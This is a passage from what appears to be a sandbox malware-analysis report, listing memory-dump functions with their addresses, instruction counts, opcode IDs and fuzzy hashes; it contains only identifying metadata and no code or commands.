                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55fca3564f84811e79fc9d85ec68e0bf384f50f9beaa4b8adda03eeb2226c170
                                                    • Instruction ID: 1749dcc56dd4a48fcb7d046b2c39afdb87d3cdd71a8d012841716ae63550476a
                                                    • Opcode Fuzzy Hash: 55fca3564f84811e79fc9d85ec68e0bf384f50f9beaa4b8adda03eeb2226c170
                                                    • Instruction Fuzzy Hash: FCD1F431B1E94E4BEB68FB6884A16B477A2FF99340F1545B9D04EC32D7DE38A942C740
                                                    Function 00007FFD9B8A0FE0 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3bc4a415da8927492953cb914ccc4be2ccf2cb2aea1320d6f091ac97254f5801
                                                    • Instruction ID: c069185bd01df7191aa1949ba32eb3648a474e5829c5e7c534de53784801981b
                                                    • Opcode Fuzzy Hash: 3bc4a415da8927492953cb914ccc4be2ccf2cb2aea1320d6f091ac97254f5801
                                                    • Instruction Fuzzy Hash: 8CC1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE38A942C740
                                                    Function 00007FFD9B8A1024 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 329eaab9543b6c9dccd2547f82eba07f2d6dc63ac2a7c517d0ad5fdee94b01aa
                                                    • Instruction ID: a3fd9ffed6b1fac9330cce097d8546cc163a4f59ee7d1bd6ab947a064ec151f9
                                                    • Opcode Fuzzy Hash: 329eaab9543b6c9dccd2547f82eba07f2d6dc63ac2a7c517d0ad5fdee94b01aa
                                                    • Instruction Fuzzy Hash: 23C1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F9C Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f87c7e2ed9d23dfee7f24b6f7e2b23c397b0df4acae0bb5f9a4cbffba67472a7
                                                    • Instruction ID: 58e846324dcada1bb65a93c14bee8428d571c300e64110069ee4c8a3e3e5fd1c
                                                    • Opcode Fuzzy Hash: f87c7e2ed9d23dfee7f24b6f7e2b23c397b0df4acae0bb5f9a4cbffba67472a7
                                                    • Instruction Fuzzy Hash: 50C1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F14 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db1b7d8787d7824903450f33be3b31dc1461c2f2dd3889bd9cd0c0dfa07df452
                                                    • Instruction ID: 31191bb477d4831e842d11b6255ea774278ae2d244c015d6ac683ca84269e1d9
                                                    • Opcode Fuzzy Hash: db1b7d8787d7824903450f33be3b31dc1461c2f2dd3889bd9cd0c0dfa07df452
                                                    • Instruction Fuzzy Hash: D5C1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F58 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f3d0ad259bcd6025775150b4c5a82a7325dcd4e30dd7121b7dcaf692ff92806
                                                    • Instruction ID: 9e43e232d35202a6d063e1f65a33620d18ce4866010c0dbb0a4fb7421a9246fc
                                                    • Opcode Fuzzy Hash: 5f3d0ad259bcd6025775150b4c5a82a7325dcd4e30dd7121b7dcaf692ff92806
                                                    • Instruction Fuzzy Hash: 82C1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0ED0 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37e5dbe44781f4f4ae2d0bb50d07ccf586572e846f22dbd4de4be53a19a996dd
                                                    • Instruction ID: 7dcf81629f433d83912ddd588b1542ef6dbffd5477daa74d4d9352c23f644f82
                                                    • Opcode Fuzzy Hash: 37e5dbe44781f4f4ae2d0bb50d07ccf586572e846f22dbd4de4be53a19a996dd
                                                    • Instruction Fuzzy Hash: 67C1E331B1D90E4BEB68EB6884A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8C2E25 Relevance: .3, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58209809bec6de1d03b063f0ca6e21808492054b2b2228607aac3e186f5b616e
                                                    • Instruction ID: 168c0a21beadb338d3febd766c6c3bf8ed566e317d91e2c9efb214d8eee89cc1
                                                    • Opcode Fuzzy Hash: 58209809bec6de1d03b063f0ca6e21808492054b2b2228607aac3e186f5b616e
                                                    • Instruction Fuzzy Hash: A69106A1B1DA4E4EEBACFB9844B667573D2EF98300F0581BAD40DC71D7ED28AD468341
                                                    Function 00007FFD9B8B92D3 Relevance: .2, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c28197198721f5d1d5fe3463133f2eb7311956c66febd3337cc0c36e57d7074f
                                                    • Instruction ID: ae2e47421cf69e5f6c1bbcd080745bfd55235c6f560d1a3e9fb3aed72aff78b1
                                                    • Opcode Fuzzy Hash: c28197198721f5d1d5fe3463133f2eb7311956c66febd3337cc0c36e57d7074f
                                                    • Instruction Fuzzy Hash: F0618430B1891A4FDB58EB68C4A5AB973A2FF9C314F514579D01DC32DADF38A942CB81
                                                    Function 00007FFD9B8B936D Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6aecbadc8aa80495f71fecd00fa9043f875663b401490629671edb19e69c9e6d
                                                    • Instruction ID: e7ee821bb9bd30e4e653ffd7f290c692c4b595772520965f936cc5f4c9d13099
                                                    • Opcode Fuzzy Hash: 6aecbadc8aa80495f71fecd00fa9043f875663b401490629671edb19e69c9e6d
                                                    • Instruction Fuzzy Hash: DD413130B1891A8FDB58EB6CC458AB877E2FF9C310F514579D01EC76D5DB39A8418B80
                                                    Function 00007FFD9B890908 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: 6b0d3857097c0c39b3b21018850544af27ca86e0bd93f3b5fbe0ec2a6bffd228
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: F221E63130D9184FEB68EB4CE889EB977D1FB4932131501BAE58EC7136E911EC8287C1
                                                    Function 00007FFD9B890998 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74f1444e4105e04a557e6c089cfb8c2a0948386bb91d6d36028929776e262d53
                                                    • Instruction ID: cab7764d9b7ad291bf4cf6674d6fe8c6d1f9ed1ca60b626654b295ec16cf6d67
                                                    • Opcode Fuzzy Hash: 74f1444e4105e04a557e6c089cfb8c2a0948386bb91d6d36028929776e262d53
                                                    • Instruction Fuzzy Hash: B7212820B1D91D0FEB58B76C586A679BBD6DF9C311B0200B9E40EC32F7DD24AC828281
                                                    Function 00007FFD9B890C25 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction ID: 0eb1816e4859b014fe76b079af624b1a3b2b5f87deda55050c2cb8d8501ee90a
                                                    • Opcode Fuzzy Hash: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction Fuzzy Hash: 29213736B0D25D8FEB16A7A8AC250DC7F60EF46324F0541F3D1588B1D3D93826469791
                                                    Function 00007FFD9B8C1F39 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ffca31f7878a7e2fdf8554b502d432bbe766bd1c9ec1157051afba6db6fb22c1
                                                    • Instruction ID: 3745642970ef04efb86f1471a6c4f1df59910edf4a425629dd6237eea15dba99
                                                    • Opcode Fuzzy Hash: ffca31f7878a7e2fdf8554b502d432bbe766bd1c9ec1157051afba6db6fb22c1
                                                    • Instruction Fuzzy Hash: 0D21E571F1C5598FEBA8FB48D4A1BB473D2EB98710F1602BAE04DC32D2DA346D418781
                                                    Function 00007FFD9B892801 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction ID: 8363ff0c8168b5caa863c0ec1a8c88efa1fd40ada2eb302dae809357072695f7
                                                    • Opcode Fuzzy Hash: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction Fuzzy Hash: C1118131B1D90E4BEFA8EBD898A16FC7691FF4C311F410176C40EE32A2DE28AA458740
                                                    Function 00007FFD9B8C1E71 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2dfa5033cfccd896c2feb22401e721a7ca141cf6e4574350e73fec30ac536d6
                                                    • Instruction ID: a6183d985660185b4d430529cb392ea5627debe73a91246ab1a3676a74391e55
                                                    • Opcode Fuzzy Hash: a2dfa5033cfccd896c2feb22401e721a7ca141cf6e4574350e73fec30ac536d6
                                                    • Instruction Fuzzy Hash: 84219071B0995A8BE7A8FB88D4A47B47392FFDC310F05467AE04DC72D6DE286941C781
                                                    Function 00007FFD9B8908F8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 4a68c82410f867bffd8e045ff540c6ca1fe90de9d113405a1f11985fa32cb7d3
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: 28012432B0E92C0B9A38925D984A939B7C2EBDAA303561239D88EC3265CC10BC0343C4
                                                    Function 00007FFD9B890C38 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction ID: 776413dbcdf361e859ed4126dd996fe4202a5aa6722317317a869c86bb918d17
                                                    • Opcode Fuzzy Hash: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction Fuzzy Hash: 6811C235B1E28D8FEB12DBB8986419C7FB0EF56714F0644F7C094DB2A2D53827498790
                                                    Function 00007FFD9B890C40 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction ID: b7756bb0709f97f274fa18c8e81a7481ea5173687f4e3b7c945522ae8314e0a2
                                                    • Opcode Fuzzy Hash: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction Fuzzy Hash: 4011AD35A1E28D8FEB12DBB4886419C7FB0EF56714F0641F7D494DB2A2D9382B498790
                                                    Function 00007FFD9B8928A9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction ID: 551839c90e453559f3579b80c777a3c1b08797269cf072de5c7e795eeb843971
                                                    • Opcode Fuzzy Hash: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction Fuzzy Hash: A2018F21B1A50E8BEF68EBE8C4A46B82792EF98351F024175D40ED32F6DD29AA418740
                                                    Function 00007FFD9B890C48 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction ID: b6240e9690ef3028b9ffe91f849d668afec13e87a95ae2d3c21249b547c8fee2
                                                    • Opcode Fuzzy Hash: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction Fuzzy Hash: 2B018C35A1E28D8FEB16DBB488641987FB0EF46714F1641F7D054DB2A6D9386B48C780
                                                    Function 00007FFD9B894EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1bcb67b7e604eccb2db12c50b9fe5437e5ed5668320d106fb22c4bb1a3fda0b
                                                    • Instruction ID: 77870895615458b58bf6bbc323abb31916768d215e33bcad183eed320b8b1136
                                                    • Opcode Fuzzy Hash: d1bcb67b7e604eccb2db12c50b9fe5437e5ed5668320d106fb22c4bb1a3fda0b
                                                    • Instruction Fuzzy Hash: B5012C35908A59CFCB55EB18C895A9977F1FB6C310F45069AD409D72A1DB34AE41CF80
                                                    Function 00007FFD9B890C50 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction ID: d36249f8b8b8cfcbd95815f1244933d8a273a63c587a6b87793ec0b606a5f5c0
                                                    • Opcode Fuzzy Hash: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction Fuzzy Hash: 33015A34A1E2898FEB16DBA488A41987FB0EF16704F1641E7D454DB2A6D9386B448741
                                                    Function 00007FFD9B8BF335 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3502676996c1cf59f62a74196ab13edf4168b181470d96f31e177126f43f7e9
                                                    • Instruction ID: e9b9f58120729c7d2060666319eb75fc90fa194c917c804abb09d48d3c507c94
                                                    • Opcode Fuzzy Hash: c3502676996c1cf59f62a74196ab13edf4168b181470d96f31e177126f43f7e9
                                                    • Instruction Fuzzy Hash: 6CF0EC52A1EBDA1FD3A9877C18611A46BE1F79D260B4D01E7D0C8C7193E80D5C564391
                                                    Function 00007FFD9B89291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 46210ba721b55378ddd7f3797381cbcb531c8190a2683e15068ceb93a91e0b4c
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: E2F03130B1A50E8BEF79EB94C8A47F87761EB58311F1141B9C40EA22A1DE386A84CB40
                                                    Function 00007FFD9B890B77 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction ID: 206be18c23f38dd525a492dab24fa65cb5314288f6118ac102f33633d90ccd54
                                                    • Opcode Fuzzy Hash: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction Fuzzy Hash: 23F0E53525E689CFD741A738C8A16D4BFA0EF03209F4A11EAC489C7963D214585DCB41
                                                    Function 00007FFD9B8A498C Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction ID: bad518acc27fe1c404c169eef8642165906cc6c703a683659a398b6251eb2c1c
                                                    • Opcode Fuzzy Hash: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction Fuzzy Hash: 96F08230B0954E8BEB28AB48D4506B932D0EB58351F1A4178E80EC31A7EE28EA428694
                                                    Function 00007FFD9B8928F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: ec5ad483bb3efd2e72b375a089abd2d58b36189eb7ab0fa2f9a96cd09fbe77f8
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 3AF05E30B1A50E8BEFB8DBD4C8A47B83751EF58311F014275D44DA72F2CD29AF858A40
                                                    Function 00007FFD9B8BC929 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction ID: 649d80ddc78763315b1cd4f9598a5fb85a2babc7086c09b8de3e7fd6cf4475e4
                                                    • Opcode Fuzzy Hash: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction Fuzzy Hash: EDF0657151E3C44FC3129B3888594547FB0EE1710535B05EBC0C9CB473D65A8987C312
                                                    Function 00007FFD9B8A3B10 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                    Function 00007FFD9B89708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction ID: 9f6aacdc4b264e02c7040e5d4e17a3e8f7e84f57516213c08f7f68546743d208
                                                    • Opcode Fuzzy Hash: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction Fuzzy Hash: 4BE01212F5D54D46FBBCA3A858363B854C2EF9C704F4A41B9A05DC32D3DC482D800393
                                                    Function 00007FFD9B8A4028 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
